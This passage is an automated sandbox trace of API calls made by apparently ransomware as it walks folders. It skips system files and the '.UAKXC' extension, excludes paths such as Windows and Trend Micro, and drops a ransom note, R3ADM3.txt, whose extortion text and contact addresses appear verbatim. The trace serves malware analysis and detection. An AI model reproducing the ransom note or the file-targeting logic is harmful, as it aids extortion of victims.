out: hHeap=0xea0000) returned 1 [0140.063] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58acdb70, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58acdb70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58acdb70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.063] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.063] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.063] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.063] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.063] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.063] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.063] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.064] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.064] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.064] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58acdb70, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58acdb70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58acdb70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.064] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0140.064] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.064] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.064] Sleep (dwMilliseconds=0x32) [0140.120] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0140.120] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.120] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec490 [0140.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0140.121] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed440 [0140.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0140.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.121] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\uninstall information\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0140.122] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.122] WriteFile (in: hFile=0x6cc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.123] CloseHandle (hObject=0x6cc) returned 1 [0140.124] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed440 | out: hHeap=0xea0000) returned 1 [0140.124] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0140.124] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Uninstall Information\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x58b660f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58b660f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.124] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x58b660f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58b660f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.124] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7de6300, ftCreationTime.dwHighDateTime=0x1d5a522, ftLastAccessTime.dwLowDateTime=0xcbefac10, ftLastAccessTime.dwHighDateTime=0x1d5a501, ftLastWriteTime.dwLowDateTime=0xcbefac10, ftLastWriteTime.dwHighDateTime=0x1d5a501, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fpos.exe", cAlternateFileName="")) returned 1 [0140.124] lstrcmpW (lpString1="fpos.exe", lpString2=".") returned 1 [0140.124] lstrcmpW (lpString1="fpos.exe", lpString2="..") returned 1 [0140.124] StrStrIW (lpFirst="fpos.exe", lpSrch=".UAKXC") returned 0x0 [0140.124] StrStrIW (lpFirst="fpos.exe", lpSrch=".exe") returned=".exe" [0140.124] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e925670, ftCreationTime.dwHighDateTime=0x1d58536, ftLastAccessTime.dwLowDateTime=0x2a7c2650, ftLastAccessTime.dwHighDateTime=0x1d56a8d, ftLastWriteTime.dwLowDateTime=0x2a7c2650, ftLastWriteTime.dwHighDateTime=0x1d56a8d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ltdinfections.exe", cAlternateFileName="LTDINF~1.EXE")) returned 1 [0140.125] lstrcmpW (lpString1="ltdinfections.exe", lpString2=".") returned 1 [0140.125] lstrcmpW (lpString1="ltdinfections.exe", lpString2="..") returned 1 [0140.125] StrStrIW (lpFirst="ltdinfections.exe", lpSrch=".UAKXC") returned 0x0 [0140.125] StrStrIW (lpFirst="ltdinfections.exe", lpSrch=".exe") returned=".exe" [0140.125] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b660f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58b660f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58b660f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.125] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.125] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.125] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.125] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b660f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58b660f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58b660f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.126] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaa50 | out: hHeap=0xea0000) returned 1 [0140.126] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d30 | out: hHeap=0xea0000) returned 1 [0140.126] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.126] Sleep (dwMilliseconds=0x32) [0140.276] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec490 | out: hHeap=0xea0000) returned 1 [0140.276] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0140.276] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed058 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0140.276] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0140.276] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0140.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0140.277] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed058 | out: hHeap=0xea0000) returned 1 [0140.277] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\R3ADM3.txt" (normalized: "c:\\programdata\\adobe\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0 [0140.277] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.277] WriteFile (in: hFile=0x6d0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.279] CloseHandle (hObject=0x6d0) returned 1 [0140.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0140.279] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0140.279] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x58ce2eb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58ce2eb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.279] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.279] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x58ce2eb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58ce2eb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.279] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.279] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0140.280] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0140.280] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="tmp") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="winnt") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="temp") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="thumb") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="$Recycle.Bin") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="System Volume Information") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="Boot") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="Windows") returned 0x0 [0140.280] StrStrIW (lpFirst="Acrobat", lpSrch="Trend Micro") returned 0x0 [0140.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0140.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0140.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0140.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0140.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0140.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed058 [0140.280] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0140.280] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0140.280] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0140.281] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0140.281] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="tmp") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="winnt") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="temp") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="thumb") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="$Recycle.Bin") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="System Volume Information") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="Boot") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="Windows") returned 0x0 [0140.281] StrStrIW (lpFirst="ARM", lpSrch="Trend Micro") returned 0x0 [0140.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0140.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0140.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0140.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0140.281] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3fc8 | out: hHeap=0xea0000) returned 1 [0140.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed080 [0140.281] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd20 [0140.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0140.282] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58ce2eb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58ce2eb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58ce2eb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.282] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.282] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.282] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.282] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58ce2eb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58ce2eb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58ce2eb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0140.282] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0140.282] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0140.282] Sleep (dwMilliseconds=0x32) [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.349] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.349] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0140.350] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\R3ADM3.txt" (normalized: "c:\\programdata\\microsoft\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0140.350] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.350] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.351] CloseHandle (hObject=0x210) returned 1 [0140.352] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.352] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0140.352] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58d7b430, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58d7b430, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.352] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58d7b430, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58d7b430, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.352] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.352] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0140.352] lstrcmpW (lpString1="Assistance", lpString2=".") returned 1 [0140.352] lstrcmpW (lpString1="Assistance", lpString2="..") returned 1 [0140.352] StrStrIW (lpFirst="Assistance", lpSrch="tmp") returned 0x0 [0140.352] StrStrIW (lpFirst="Assistance", lpSrch="winnt") returned 0x0 [0140.352] StrStrIW (lpFirst="Assistance", lpSrch="temp") returned 0x0 [0140.352] StrStrIW (lpFirst="Assistance", lpSrch="thumb") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="$Recycle.Bin") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="System Volume Information") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="Boot") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="Windows") returned 0x0 [0140.353] StrStrIW (lpFirst="Assistance", lpSrch="Trend Micro") returned 0x0 [0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 